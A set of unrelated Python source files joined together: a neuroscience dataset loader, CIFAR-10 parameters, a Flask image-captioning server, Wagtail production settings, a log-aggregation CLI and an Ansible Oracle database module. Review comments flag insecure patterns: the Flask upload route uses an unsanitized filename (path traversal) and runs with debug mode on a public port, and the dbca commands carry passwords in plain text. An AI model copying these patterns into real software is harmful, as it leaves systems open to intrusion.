                        resultmodel.patient_id)
                # create data structures of the results
                self.datasets.append(resultmodel)
                self.dataset_ids.append(resultmodel.dataset_id)
        else:
            raise RuntimeError(
                "Datasets for this patient are already loaded! Need to run reset() first!")
    def trim_datasets(self, resultmodel, offset_sec):
        """Trim a result model around its onset and return (data, metadata)."""
        resultmodel.trim_aroundonset(offset_sec=offset_sec)
        data = resultmodel.get_data()
        # NOTE(review): `metadata` is assigned from get_data() as well — this
        # looks like a copy-paste slip; presumably get_metadata() was intended.
        # Confirm against the ResultLoader model API.
        metadata = resultmodel.get_data()
        return data, metadata
    def load_onsetchans_fromexcel(self, patid):
        """Look up the clinically hypothesized EZ contacts for *patid* from the
        (hard-coded, machine-specific) excel datasheet."""
        # NOTE(review): `datafile` is built but never used; only `alldatafile`
        # is read below. Hard-coded absolute paths limit portability.
        datafile = os.path.join(
            "/Users/adam2392/Dropbox/phd research/Fragility Analysis Project/datasheet_manual_notes.xlsx")
        dropboxdir = "/Users/adam2392/Dropbox/phd_research/Fragility_Analysis_Project/"
        alldatafile = os.path.join(
            dropboxdir, "organized_clinical_datasheet_formatted.xlsx")
        from ast import literal_eval
        sheetreader = ExcelReader(alldatafile)
        df = sheetreader.df
        # Stored as a stringified Python list in the sheet; parse it safely.
        ezcontacts = df[df['patid'] == patid]['ez_hypo_contacts'].values[0]
        ezcontacts = literal_eval(ezcontacts)
        return ezcontacts
|
# -*- coding: utf-8 -*-
"""This file contains all model parameters"""
# Specify Model to be trained
input_file = "Models/Inputs/cifar10_input.py"
network_file = "Models/Networks/cnn2_2.py"
opt_file = "Models/Optimizer/adam.py"
# Optionally: Where to download data
data_url = 'http://www.cs.toronto.edu/~kriz/cifar-10-binary.tar.gz'
# Data Params
crop_size = 32  # raw CIFAR-10 image edge length (pixels)
image_size = 24  # edge length after cropping
num_classes = 10
num_channels = 3  # RGB
num_examples_per_epoch_for_train = 50000
num_examples_per_epoch_for_eval = 10000
# Train Params
batch_size = 128
max_steps = 200000  # Number of steps to run trainer.
learning_rate = 0.01  # Learning rate
import os
import requests
from flask import Flask, render_template, request, jsonify
import tensorflow as tf
from config import Config
from model import CaptionGenerator
from dataset import prepare_train_data, prepare_eval_data, prepare_test_data
# Flask application object; the routes below are registered against it.
app = Flask(__name__)
def download_file_from_google_drive(destination):
    """Download the pretrained model weights to *destination*.

    NOTE(review): despite the function name, the hard-coded URL points at a
    Box (boxcloud.com) share, not Google Drive — and such pre-signed links
    typically expire; confirm it still resolves.
    """
    URL = "https://public.boxcloud.com/d/1/b1!cThk862sN_mEYixwOAB-XR03H6HSHl7Of1enrson40a0Q86bGizmxgtAP9Rvg6uEIJb0cR43HGRb53_FCEFBUhJt0GG8hksOO-2Cqx-PN-CIm_c7LLvlVmbLDQrGPG2ck9GKmp19vm-2UqSKCPYL2K_zcBmP9h6SECnzGusb3VP0tSB_qgSkIhtE3TeVei3A1_jb4y9fPSHXBR1awbfELQlF8gZu9ElRgID_6zaA2yhAMrA59xHztdK1BKKW9BWUC5QqeHo3xewgXo-E_Cms5sYyM4aYeKd9cUFRGiEW41YNWHybCpRlxFJpYrikC72M_AsN-gC2CfPIvFpgE21cJFqA_vQYHO26L4QmvsYr0RMUzbTrWhO9c_I07ZTssV8InN-LwZNHAcj8prpPWovbR_pRX4OvB1eJalINAt4R8ZzLEdaenylhICK86Pi7-piEaiFbjE81LPu23NNHSO1BBDk8s2H_euMNxp5_agYQ5ee44hakye_CTRI8hGXzWG4EJdldOd_EmIjIIYNweFjtyFz_ye3koss24ZhfWOEEfkyrWAEBGQd5A_Q-to9dX6qr58vXfCCD0utjYG2UR3x6OOKh--YhrQ-O7umY42n-A90XToFYQj-LJIYD98BKe2ylLR2F8PwiF6kl_2zxoGHd8Ckzm-CSnZ_xviPPAAl4A__d0Bz5tKQil2woFFD0wkEfquSdqBt4WJIHbT8LX3GuB5fUGpqQnX3Dj2d-cJGmluTisQNisj1zQ0pCAnzQQMAWgpiH7T1biaGSGebXSegV3-rWWJVj6o8GO6hSaTMCErR_dPVAmrmqlNsg23FOv3u27Dl4jnKWHv-ZowWTsh8Y5JpFDQW2-09wmgdnpAvHeUbgRTdSgQn2uFJB4HQOQaM6YjcAHPFvpgKcgckS17ldzuQQK4rw6__rxh3Lw0nY5NX5ge-KdkWaq_yCoqsPxCv7QISXvHIeF07uEBNEOm9Q0VKlsqflUz69Vlsp0sM1tgdpCEu0tfC-avubD17pxUrQhvVA47NSC52AMsBIZG8RR6ql1Z0HXr2xtYgYUE3KonAY-ANLkPTubjem-P2z7p-PARJHrKqu97--zPgdiERQSzMmgCCCOHYBFeYbIeXmb9-TNTlbcsuCS8_NDC18jvBcvTpeoUkiTnHfVV8M9wyaMbZJwVaj2NXT0LdzfPvcIJkwHgtNk0zcz_oFdRZwj76emYd_9vXYqMkggvU0yXrkfRnQjVO0DsCK248k36CccSyWJOcaollzIdid3ivu4FMMAgCdF8E./download"
    session = requests.Session()
    response = session.get(URL, stream = True)
    save_response_content(response, destination)
def save_response_content(response, destination):
    """Stream the *response* body to the file at *destination* in 32 KiB chunks."""
    chunk_size = 32768
    with open(destination, "wb") as out:
        # filter(None, ...) drops the empty keep-alive chunks
        for chunk in filter(None, response.iter_content(chunk_size)):
            out.write(chunk)
def setup_model():
    """Fetch the pretrained weights unless they are already present on disk."""
    destination = 'models/model.npy'
    if os.path.exists(destination):
        return
    download_file_from_google_drive(destination)
# setup_model()
# NOTE(review): the weight download above is disabled — presumably
# models/model.npy is already bundled; confirm before deploying.
config = Config()
config.beam_size = 3
config.phase = 'test'
config.train_cnn = False
# Build the TF session and caption model once at import time so that every
# request reuses the same loaded model.
sess = tf.Session()
model = CaptionGenerator(config)
model.load(sess)
# Freeze the graph to catch accidental graph modifications at request time.
tf.get_default_graph().finalize()
@app.route('/')
def index():
    """Serve the upload page."""
    return render_template('index.html')
@app.route('/analyze', methods=['POST'])
def analyze():
    """Caption an uploaded image and return the first caption as JSON."""
    f = request.files['file']
    # NOTE(review): f.filename is used unsanitized in a filesystem path; a
    # crafted filename could escape ./test/images — consider
    # werkzeug.utils.secure_filename. Confirm and fix.
    f.save(os.path.join('./test/images', f.filename))
    data, vocabulary = prepare_test_data(config)
    captions = model.test(sess, data, vocabulary)
    # Clean up the uploaded file once captioning is done.
    os.remove(os.path.join('./test/images', f.filename))
    return jsonify({'result': captions[0]})
# NOTE(review): debug=True on a publicly bound port (0.0.0.0:80) exposes the
# Werkzeug debugger — disable for production.
if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80, debug=True)
|
"""Overwrite settings with production settings when going live."""
from .settings_base import *
import os
import logging.config
# Do not set SECRET_KEY, Postgres or LDAP password or any other sensitive data here.
# Instead, use environment variables or create a local.py file on the server.
# Disable debug mode
DEBUG = False
TEMPLATES[0]['OPTIONS']['debug'] = False
# Configuration from environment variables
# Alternatively, you can set these in a local.py file on the server
env = os.environ.copy()
# Basic configuration
# APP_NAME = env.get('APP_NAME', 'wagtailvue')
# NOTE(review): APP_NAME is referenced below (CACHES KEY_PREFIX, Elasticsearch
# INDEX) but its assignment here is commented out — presumably it comes from
# settings_base via the star import; confirm, otherwise enabling Redis or
# Elasticsearch raises NameError.
if 'SECRET_KEY' in env:
    SECRET_KEY = env['SECRET_KEY']
if 'ALLOWED_HOSTS' in env:
    ALLOWED_HOSTS = env['ALLOWED_HOSTS'].split(',')
if 'PRIMARY_HOST' in env:
    BASE_URL = 'http://%s/' % env['PRIMARY_HOST']
if 'SERVER_EMAIL' in env:
    SERVER_EMAIL = env['SERVER_EMAIL']
# Front-end cache purging is only enabled when a purge URL is provided.
if 'CACHE_PURGE_URL' in env:
    INSTALLED_APPS += ( 'wagtail.contrib.frontend_cache', )
    WAGTAILFRONTENDCACHE = {
        'default': {
            'BACKEND': 'wagtail.contrib.frontend_cache.backends.HTTPBackend',
            'LOCATION': env['CACHE_PURGE_URL'],
        },
    }
# Email via ESP
if 'MAILGUN_KEY' in os.environ:
    EMAIL_BACKEND = "anymail.backends.mailgun.EmailBackend"
    ANYMAIL = {
        "MAILGUN_API_KEY": env['MAILGUN_KEY'],
        "MAILGUN_SENDER_DOMAIN": env['MAILGUN_DOMAIN']
    }
    DEFAULT_FROM_EMAIL = env['MAILGUN_FROM']
# Redis location can either be passed through with REDIS_HOST or REDIS_SOCKET
if 'REDIS_URL' in env:
    REDIS_LOCATION = env['REDIS_URL']
    BROKER_URL = env['REDIS_URL']
elif 'REDIS_HOST' in env:
    REDIS_LOCATION = env['REDIS_HOST']
    BROKER_URL = 'redis://%s' % env['REDIS_HOST']
elif 'REDIS_SOCKET' in env:
    REDIS_LOCATION = 'unix://%s' % env['REDIS_SOCKET']
    BROKER_URL = 'redis+socket://%s' % env['REDIS_SOCKET']
else:
    REDIS_LOCATION = None
# Use Redis for the default cache when any Redis location was configured.
if REDIS_LOCATION is not None:
    CACHES = {
        'default': {
            'BACKEND': 'django_redis.cache.RedisCache',
            'LOCATION': REDIS_LOCATION,
            'KEY_PREFIX': APP_NAME,
            'OPTIONS': {
                'CLIENT_CLASS': 'django_redis.client.DefaultClient',
            }
        }
    }
# Use Elasticsearch as the search backend for extra performance and better search results
if 'ELASTICSEARCH_URL' in env:
    WAGTAILSEARCH_BACKENDS = {
        'default': {
            'BACKEND': 'wagtail.search.backends.elasticsearch5',
            'URLS': [env['ELASTICSEARCH_URL']],
            'INDEX': APP_NAME,
            'ATOMIC_REBUILD': True,
        },
    }
# Logging Configuration
# Clear prev config
LOGGING_CONFIG = None
# Get loglevel from env
LOGLEVEL = os.getenv('DJANGO_LOGLEVEL', 'info').upper()
logging.config.dictConfig({
    'version': 1,
    'disable_existing_loggers': False,
    'formatters': {
        'console': {
            'format': '%(asctime)s %(levelname)s [%(name)s:%(lineno)s] %(module)s %(process)d %(thread)d %(message)s',
        },
    },
    'handlers': {
        'console': {
            'class': 'logging.StreamHandler',
            'formatter': 'console',
        },
    },
    'loggers': {
        '': {
            'level': LOGLEVEL,
            'handlers': ['console',],
        },
    },
})
# Server-specific overrides (secrets, hosts) live in an optional local.py.
try:
    from .local import *
except ImportError:
    pass
|
# import file(s)
from . import pca
# pca model
from .pca import PCA
|
from nsq.reader import Reader
from basescript import BaseScript
from logagg.collector import LogCollector
from logagg.forwarder import LogForwarder
from logagg.nsqsender import NSQSender
from logagg import util
class LogaggCommand(BaseScript):
    """Command line tool wiring the log collector and forwarder to NSQ."""
    DESC = "Logagg command line tool"
    def collect(self):
        """Run the log collector, publishing to NSQ (or a dummy sink when no
        nsqd address is given)."""
        if not self.args.nsqd_http_address:
            # No nsqd address: fall back to a no-op sender (dry run).
            nsq_sender = util.DUMMY
        else:
            nsq_sender = NSQSender(
                self.args.nsqd_http_address,
                self.args.nsqtopic,
                self.args.depth_limit_at_nsq,
                self.log,
            )
        collector = LogCollector(
            self.args.file, self.args.heartbeat_interval, nsq_sender, self.log
        )
        collector.start()
    def _parse_forwarder_target_arg(self, t):
        """Split a 'forwarder=<classpath>:k=v:k=v...' target string into
        (import path, kwargs dict); the logger is injected as 'log'."""
        path, args = t.split(":", 1)
        path = path.split("=")[1]  # drop the 'forwarder=' prefix
        args = dict(a.split("=", 1) for a in args.split(":"))
        args["log"] = self.log
        return path, args
    def forward(self):
        """Read messages from the NSQ topic and push them to each target."""
        targets = []
        for t in self.args.target:
            imp_path, args = self._parse_forwarder_target_arg(t)
            target_class = util.load_object(imp_path)
            target_obj = target_class(**args)
            targets.append(target_obj)
        nsq_receiver = Reader(
            topic=self.args.nsqtopic,
            channel=self.args.nsqchannel,
            nsqd_tcp_addresses=[self.args.nsqd_tcp_address],
            max_in_flight=2500,
        )
        forwarder = LogForwarder(nsq_receiver, targets, self.log)
        forwarder.start()
    def define_subcommands(self, subcommands):
        """Register the 'collect' and 'forward' subcommands and their options."""
        super(LogaggCommand, self).define_subcommands(subcommands)
        collect_cmd = subcommands.add_parser(
            "collect",
            help="Collects the logs from \
                different processes and sends to nsq",
        )
        collect_cmd.set_defaults(func=self.collect)
        collect_cmd.add_argument(
            "--file",
            nargs="+",
            help="Provide absolute path of logfile \
                including module name and function name,"
            "format: file=<filename>:formatter=<formatter function>,"
            "eg: file=/var/log/nginx/access.log:formatter=logagg.formatters.nginx_access",
        )
        collect_cmd.add_argument(
            "--nsqtopic",
            nargs="?",
            default="test_topic",
            help="Topic name to publish messages. Ex: logs_and_metrics",
        )
        collect_cmd.add_argument(
            "--nsqd-http-address",
            nargs="?",
            help="nsqd http address where we send the messages, eg. localhost:4151",
        )
        collect_cmd.add_argument(
            "--depth-limit-at-nsq",
            type=int,
            default=10000000,
            help="To limit the depth at nsq topic",
        )
        collect_cmd.add_argument(
            "--heartbeat-interval",
            type=int,
            default=30,
            help='Time interval at which regular heartbeats to a nsqTopic \
                "heartbeat" to know which hosts are running logagg',
        )
        forward_cmd = subcommands.add_parser(
            "forward",
            help="Collects all the messages\
                from nsq and pushes to storage engine",
        )
        forward_cmd.set_defaults(func=self.forward)
        forward_cmd.add_argument(
            "--nsqtopic",
            help="NSQ topic name to read messages from. Ex: logs_and_metrics",
        )
        forward_cmd.add_argument(
            "--nsqchannel",
            help="NSQ channel name to read messages from. Ex: logs_and_metrics",
        )
        forward_cmd.add_argument(
            "--nsqd-tcp-address",
            default="localhost:4150",
            help="nsqd tcp address where we get the messages",
        )
        forward_cmd.add_argument(
            "-t",
            "--target",
            nargs="+",
            help="Target database and database details,"
            'format: "forwarder=<forwarder-classpath>:host=<hostname>:port=<port-number>:user=<user-name>:password=<password>:db=<database-name>:collection=<collection-name>",'
            "Ex: forwarder=logagg.forwarders.MongoDBForwarder:host=localhost:port=27017:user=some_user:password=xxxxx:db=logagg:collection=cluster_logs_and_metrics",
        )
def main():
    """Console-script entry point: parse args and dispatch to a subcommand."""
    LogaggCommand().start()
if __name__ == "__main__":
    main()
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
__metaclass__ = type
from ansible.module_utils.basic import AnsibleModule, os, re, subprocess, time
# cx_Oracle is optional at import time; record its availability so the module
# can fail gracefully later when database connectivity is actually required.
try:
    import cx_Oracle
except ImportError:
    cx_oracle_exists = False
else:
    cx_oracle_exists = True
DOCUMENTATION = '''
---
module: oracle_db
short_description: Manage an Oracle database
description:
- Create/delete a database using dbca
- If a responsefile is available, that will be used.
If initparams is defined, those will be attached to the createDatabase command
- If no responsefile is created, the database will be created based on all other parameters
version_added: "0.8.0"
options:
oracle_home:
description:
- The home where the database will be created
required: False
aliases: ['oh']
db_name:
description:
- The name of the database
required: True
default: None
aliases: ['db','database_name','name']
sid:
description:
- The instance name
required: False
default: None
db_unique_name:
description:
- The database db_unique_name
required: False
default: None
aliases: ['dbunqn','unique_name']
sys_password:
description:
- Password for the sys user
required: False
default: None
aliases: ['syspw','sysdbapassword','sysdbapw']
system_password:
description:
- Password for the system user
- If not set, defaults to sys_password
required: False
default: None
aliases: ['systempw']
dbsnmp_password:
description:
- Password for the dbsnmp user
- If not set, defaults to sys_password
required: False
default: None
aliases: ['dbsnmppw']
responsefile:
description:
- The name of responsefile
required: True
default: None
template:
description:
- The template the database will be based off
required: False
default: General_Purpose.dbc
cdb:
description:
- Should the database be a container database
required: False
default: False
aliases: ['container']
choices: ['True','False']
datafile_dest:
description:
- Where the database files should be placed (ASM diskgroup or filesystem path)
required: False
default: False
aliases: ['dfd']
recoveryfile_dest:
description:
- Where the database files should be placed (ASM diskgroup or filesystem path)
required: False
default: False
aliases: ['rfd']
storage_type:
description:
- Type of underlying storage (Filesystem or ASM)
required: False
default: FS
aliases: ['storage']
choices: ['FS','ASM']
dbconfig_type:
description:
- Type of database (SI,RAC,RON)
required: False
default: SI
choices: ['SI','RAC','RACONENODE']
db_type:
description:
- Default Type of database (MULTIPURPOSE, OLTP, DATA_WAREHOUSING)
required: False
default: MULTIPURPOSE
choices: ['MULTIPURPOSE','OLTP','DATA_WAREHOUSING']
racone_service:
description:
- If dbconfig_type = RACONENODE, a service has to be created along with the DB. This is the name of that service
- If no name is defined, the service will be called "{{ db_name }}_ronserv"
required: False
default: None
aliases: ['ron_service']
characterset:
description:
- The database characterset
required: False
default: AL32UTF8
memory_percentage:
description:
- The database total memory in % of available memory
required: False
memory_totalmb:
description:
- The database total memory in MB. Defaults to 1G
required: False
default: ['1024']
nodelist:
description:
- The list of nodes a RAC DB should be created on
required: False
amm:
description:
- Should Automatic Memory Management be used (memory_target, memory_max_target)
required: False
Default: False
choices: ['True','False']
initparams:
description:
- List of key=value pairs
- e.g
- "init_params:"
- " - sga_target=1G"
- " - sga_max_size=1G"
required: False
customscripts:
description:
- List of scripts to run after database is created
- e.g
- "customScripts:"
- " - /tmp/xxx.sql"
- " - /tmp/yyy.sql"
required: False
default_tablespace_type:
description:
- Database default tablespace type (DEFAULT_TBS_TYPE)
default: smallfile
choices: ['smallfile','bigfile']
default_tablespace:
description:
- Database default tablespace
default: smallfile
required: False
default_temp_tablespace:
description:
- Database default temporary tablespace
required: False
archivelog:
description:
- Puts the database is archivelog mode
required: False
default: false
choices: ['True','False']
type: bool
force_logging:
description:
- Enables force logging for the Database
required: False
default: false
choices: ['True','False']
type: bool
flashback:
description:
- Enables flashback for the database
required: False
default: false
choices: ['True','False']
type: bool
state:
description:
- The intended state of the database
default: present
choices: ['present','absent']
hostname:
description:
- The host of the database if using dbms_service
required: false
default: localhost
aliases: ['host']
port:
description:
- The listener port to connect to the database if using dbms_service
required: false
default: 1521
notes:
- cx_Oracle needs to be installed
requirements: [ "cx_Oracle" ]
author: Mikael Sandström, oravirt@gmail.com, @oravirt
'''
EXAMPLES = '''
- name: Create a DB (non-cdb)
oracle_db:
oh: /u01/app/oracle/12.2.0.1/db1
db_name: orclcdb
syspw: Oracle_123
state: present
storage: ASM
dfd: +DATA
rfd: +DATA
default_tablespace_type: bigfile
- hosts: all
gather_facts: true
vars:
oracle_home: /u01/app/oracle/12.2.0.1/db1
dbname: orclcdb
dbunqname: "{{ dbname}}_unq"
container: True
dbsid: "{{ dbname }}"
hostname: "{{ ansible_hostname }}"
oracle_env:
ORACLE_HOME: "{{ oracle_home }}"
LD_LIBRARY_PATH: "{{ oracle_home }}/lib"
myaction: present
rspfile: "/tmp/dbca_{{dbname}}.rsp"
initparameters:
- memory_target=0
- memory_max_target=0
- sga_target=1500M
- sga_max_size=1500M
dfd: +DATA
rfd: +FRA
storage: ASM
dbtype: SI
#ron_service: my_ron_service
#clnodes: racnode-dc1-1,racnode-dc1-2
tasks:
- name: Manage database
oracle_db:
service_name={{ dbname }}
hostname={{ hostname}}
user=sys
password=Oracle_123
state={{ myaction }}
db_name={{ dbname }}
sid={{ dbsid |default(omit)}}
db_unique_name={{ dbunqname |default(omit) }}
sys_password=Oracle_123
system_password=Oracle_123
responsefile={{ rspfile |default(omit) }}
cdb={{ container |default (omit)}}
initparams={{ initparameters |default(omit)}}
datafile_dest={{ dfd }}
recoveryfile_dest={{rfd}}
storage_type={{storage}}
dbconfig_type={{dbtype}}
racone_service={{ ron_service|default(omit)}}
amm=False
memory_totalmb=1024
nodelist={{ clnodes |default(omit) }}
environment: "{{ oracle_env }}"
run_once: True
'''
# NOTE(review): `global` statements at module level are no-ops in Python —
# they only have an effect inside a function body. These presumably document
# the module-wide state shared by the helper functions below; confirm intent.
global gimanaged
global major_version
global user
global password
global service_name
global hostname
global port
global israc
global newdb
global output
global verbosemsg
global verboselist
def get_version(module, oracle_home):
    """Return the Oracle version prefix (e.g. '12.2') reported by `sqlplus -V`.

    Fails the Ansible module (which exits) when sqlplus cannot be run.
    """
    command = '%s/bin/sqlplus -V' % oracle_home
    rc, stdout, stderr = module.run_command(command)
    if rc == 0:
        # Output looks like 'SQL*Plus: Release 12.2.0.1.0 ...'; token 2 is the
        # release string, trimmed to its first four characters.
        return stdout.split(' ')[2][0:4]
    msg = 'Error - STDOUT: %s, STDERR: %s, COMMAND: %s' % (stdout, stderr, command)
    module.fail_json(msg=msg, changed=False)
# Check if the database exists
def check_db_exists(module, oracle_home, db_name, sid, db_unique_name):
    """Return True if the database is already registered on this host.

    GI-managed hosts are checked via 'srvctl config database'; otherwise
    /etc/oratab is scanned for a db_name/sid entry. Fails the module when the
    database exists but under a different ORACLE_HOME.
    NOTE(review): in the non-GI branch, when oratab entries exist but none
    matches, the function falls off the end and returns None (falsy) -- callers
    treat that the same as False, but confirm this is intentional.
    """
    if sid is None:
        sid = ''
    if gimanaged:
        if db_unique_name is not None:
            checkdb = db_unique_name
        else:
            checkdb = db_name
        command = "%s/bin/srvctl config database -d %s " % (oracle_home, checkdb)
        (rc, stdout, stderr) = module.run_command(command)
        if rc != 0:
            if 'PRCD-1229' in stdout:  # <-- DB is created, but with a different ORACLE_HOME
                msg = 'Database %s already exists in a different home. Stdout -> %s' % (db_name, stdout)
                module.fail_json(msg=msg, changed=False)
            # NOTE(review): the next two branches are redundant (both return
            # False); any non-zero rc without PRCD-1229 means "not registered".
            elif '%s' % db_name in stdout:  # <-- db doesn't exist
                return False
            else:
                return False
        # NOTE(review): likewise, any rc == 0 result is treated as "exists"
        # regardless of whether 'Database name:' matched.
        elif 'Database name: %s' % db_name in stdout:  # <-- Database already exist
            return True
        else:
            return True
    else:
        existingdbs = []
        oratabfile = '/etc/oratab'
        if os.path.exists(oratabfile):
            with open(oratabfile) as oratab:
                for line in oratab:
                    # Skip comments and indented continuation/blank-ish lines.
                    if line.startswith('#') or line.startswith(' '):
                        continue
                    elif re.search(db_name + ':', line) or re.search(sid + ':', line):
                        existingdbs.append(line)
        if not existingdbs:  # <-- db doesn't exist
            return False
        else:
            for dbs in existingdbs:
                if sid != '':
                    if '%s:' % db_name in dbs or '%s:' % sid in dbs:
                        if dbs.split(':')[1] != oracle_home.rstrip(
                                '/'):  # <-- DB is created, but with a different ORACLE_HOME
                            msg = 'Database %s already exists in a different ORACLE_HOME (%s)' % (
                                db_name, dbs.split(':')[1])
                            module.fail_json(msg=msg, changed=False)
                        elif dbs.split(':')[1] == oracle_home.rstrip('/'):  # <-- Database already exist
                            return True
                else:
                    if '%s:' % db_name in dbs:
                        if dbs.split(':')[1] != oracle_home.rstrip(
                                '/'):  # <-- DB is created, but with a different ORACLE_HOME
                            msg = 'Database %s already exists in a different ORACLE_HOME (%s)' % (
                                db_name, dbs.split(':')[1])
                            module.fail_json(msg=msg, changed=False)
                        elif dbs.split(':')[1] == oracle_home.rstrip('/'):  # <-- Database already exist
                            return True
def create_db(module, oracle_home, sys_password, system_password, dbsnmp_password, db_name, sid, db_unique_name,
              responsefile, template, cdb,
              local_undo, datafile_dest, recoveryfile_dest, storage_type, dbconfig_type, racone_service, characterset,
              memory_percentage, memory_totalmb,
              nodelist, db_type, amm, initparams, customscripts):
    """Create the database by assembling and running 'dbca -createDatabase -silent'.

    Two modes: when *responsefile* is given, dbca reads most settings from it and
    only db_unique_name/initparams are appended via -initParams; otherwise every
    module parameter is translated to its dbca command-line switch. Fails the
    module on a non-zero dbca exit code. Returns True (and, when output ==
    'verbose', the tuple (True, verboselist)).
    NOTE(review): passwords end up on the dbca command line, which may be visible
    in process listings on the server -- confirm this is acceptable.
    """
    initparam = '-initParams '
    paramslist = ''
    command = "%s/bin/dbca -createDatabase -silent " % oracle_home
    if responsefile is not None:
        if os.path.exists(responsefile):
            command += ' -responseFile %s ' % responsefile
        else:
            msg = 'Responsefile %s doesn\'t exist' % responsefile
            module.fail_json(msg=msg, changed=False)
        if db_unique_name is not None:
            initparam += 'db_name=%s,db_unique_name=%s,' % (db_name, db_unique_name)
        if initparams is not None:
            paramslist = ",".join(initparams)
            initparam += '%s' % paramslist
    else:
        command += ' -gdbName %s' % db_name
        if sid is not None:
            command += ' -sid %s' % sid
        if sys_password is not None:
            command += ' -sysPassword %s' % sys_password
        if system_password is not None:
            command += ' -systemPassword %s' % system_password
        else:
            # system and dbsnmp passwords default to the sys password when unset.
            system_password = sys_password
            command += ' -systemPassword %s' % system_password
        if dbsnmp_password is not None:
            command += ' -dbsnmpPassword %s' % dbsnmp_password
        else:
            dbsnmp_password = sys_password
            command += ' -dbsnmpPassword %s' % dbsnmp_password
        if template:
            command += ' -templateName %s' % template
        if major_version > '11.2':
            # Container-database switches exist only from 12.1 onwards.
            if cdb:
                command += ' -createAsContainerDatabase true '
                if local_undo:
                    command += ' -useLocalUndoForPDBs true'
                else:
                    command += ' -useLocalUndoForPDBs false'
            else:
                command += ' -createAsContainerDatabase false '
        if datafile_dest is not None:
            command += ' -datafileDestination %s ' % datafile_dest
        if recoveryfile_dest is not None:
            command += ' -recoveryAreaDestination %s ' % recoveryfile_dest
        if storage_type is not None:
            command += ' -storageType %s ' % storage_type
        if dbconfig_type is not None:
            if dbconfig_type == 'SI':
                dbconfig_type = 'SINGLE'
            # dbca renamed this switch between 12.1 and 12.2.
            if major_version == '12.2':
                command += ' -databaseConfigType %s ' % dbconfig_type
            elif major_version == '12.1':
                command += ' -databaseConfType %s ' % dbconfig_type
        if dbconfig_type == 'RACONENODE':
            if racone_service is None:
                # Default RAC One Node service name derived from the db name.
                racone_service = db_name + '_ronserv'
            command += ' -RACOneNodeServiceName %s ' % racone_service
        if characterset is not None:
            command += ' -characterSet %s ' % characterset
        if memory_percentage is not None:
            command += ' -memoryPercentage %s ' % memory_percentage
        if memory_totalmb is not None:
            command += ' -totalMemory %s ' % memory_totalmb
        if dbconfig_type == 'RAC':
            if nodelist is not None:
                nodelist = ",".join(nodelist)
                command += ' -nodelist %s ' % nodelist
        if db_type is not None:
            command += ' -databaseType %s ' % db_type
        if amm is not None:
            # Automatic Memory Management flag syntax differs per dbca version.
            if major_version == '12.2':
                if amm:
                    command += ' -memoryMgmtType AUTO '
                else:
                    command += ' -memoryMgmtType AUTO_SGA '
            elif major_version == '12.1':
                command += ' -automaticMemoryManagement %s ' % (str(amm).lower())
            elif major_version == '11.2':
                if amm:
                    command += ' -automaticMemoryManagement '
        if customscripts is not None:
            scriptlist = ",".join(customscripts)
            command += ' -customScripts %s ' % scriptlist
        if db_unique_name is not None:
            initparam += 'db_name=%s,db_unique_name=%s,' % (db_name, db_unique_name)
        if initparams is not None:
            paramslist = ",".join(initparams)
            initparam += ' %s' % paramslist
    # Only append -initParams when something was actually collected.
    if initparam != '-initParams ' or paramslist != "":
        command += initparam
    (rc, stdout, stderr) = module.run_command(command)
    if rc != 0:
        msg = 'Error - STDOUT: %s, STDERR: %s, COMMAND: %s' % (stdout, stderr, command)
        module.fail_json(msg=msg, changed=False)
    else:
        if output == 'short':
            return True
        else:
            verboselist.append('STDOUT: %s, COMMAND: %s' % (stdout, command))
            return True, verboselist
def remove_db(module, msg, oracle_home, db_name, sid, db_unique_name, sys_password):
    """Delete the database with 'dbca -deleteDatabase -silent'.

    The source-DB name passed to dbca depends on GI management and on whether
    this is a RAC instance (queried live via v$instance). Fails the module on a
    non-zero dbca exit code.
    NOTE(review): with output == 'short' this returns True (caller exits with its
    own message); with 'verbose' it calls module.exit_json itself -- the two
    paths terminate differently. Confirm this asymmetry is intentional.
    """
    cursor = getconn(module)
    israc_sql = 'select parallel,instance_name,host_name from v$instance'
    israc_ = execute_sql_get(module, cursor, israc_sql)
    if gimanaged:
        if db_unique_name is not None:
            remove_db = db_unique_name
        elif sid is not None and israc_[0][0] == 'YES':
            # RAC: srvctl/dbca operate on the database name, not the instance SID.
            remove_db = db_name
        elif sid is not None and israc_[0][0] == 'NO':
            remove_db = sid
        else:
            remove_db = db_name
    else:
        if sid is not None:
            remove_db = sid
        else:
            remove_db = db_name
    command = "%s/bin/dbca -deleteDatabase -silent -sourceDB %s -sysDBAUserName sys -sysDBAPassword %s" % (
        oracle_home, remove_db, sys_password)
    (rc, stdout, stderr) = module.run_command(command)
    if rc != 0:
        msg = 'Removal of database %s failed: %s' % (db_name, stdout)
        module.fail_json(msg=msg, changed=False)
    else:
        if output == 'short':
            return True
        else:
            msg = 'STDOUT: %s, COMMAND: %s' % (stdout, command)
            module.exit_json(msg=msg, changed=True)
def ensure_db_state(module, oracle_home, db_name, db_unique_name, sid, archivelog, force_logging, flashback,
                    default_tablespace_type, default_tablespace, default_temp_tablespace):
    """Converge an existing database to the requested configuration.

    Compares the live archivelog / force-logging / flashback flags and the
    default-tablespace settings against the module parameters, applies the
    required 'alter database' statements (restarting the database only for those
    that need mount state) and always terminates the run via module.exit_json().
    """
    global israc
    cursor = getconn(module)
    alterdb_sql = 'alter database'
    # Current default tablespace settings, lower-cased for comparison.
    # NOTE(review): 'order by 1' sorts by lower(property_value) -- the values
    # themselves -- yet the result is unpacked positionally as
    # (def_tbs_type, def_tbs, def_temp_tbs). Confirm the value ordering always
    # matches that expectation.
    propsql = "select lower(property_value) from database_properties" \
              " where property_name in ('DEFAULT_TBS_TYPE','DEFAULT_PERMANENT_TABLESPACE','DEFAULT_TEMP_TABLESPACE')" \
              " order by 1"
    def_tbs_type, def_tbs, def_temp_tbs = execute_sql_get(module, cursor, propsql)
    israc_sql = 'select parallel,instance_name,host_name from v$instance'
    israc_ = execute_sql_get(module, cursor, israc_sql)
    instance_name = israc_[0][1]
    change_restart_sql = []  # statements that need the DB bounced into mount state
    change_db_sql = []       # statements that can run while the DB stays open
    log_check_sql = 'select log_mode,force_logging, flashback_on from v$database'
    log_check_ = execute_sql_get(module, cursor, log_check_sql)
    if israc_[0][0] == 'NO':
        israc = False
    else:
        israc = True
    # Desired values and the statements that would set them.
    if archivelog:
        archcomp = 'ARCHIVELOG'
        archsql = alterdb_sql + ' archivelog'
    else:
        archcomp = 'NOARCHIVELOG'
        archsql = alterdb_sql + ' noarchivelog'
    if force_logging:
        flcomp = 'YES'
        flsql = alterdb_sql + ' force logging'
    else:
        flcomp = 'NO'
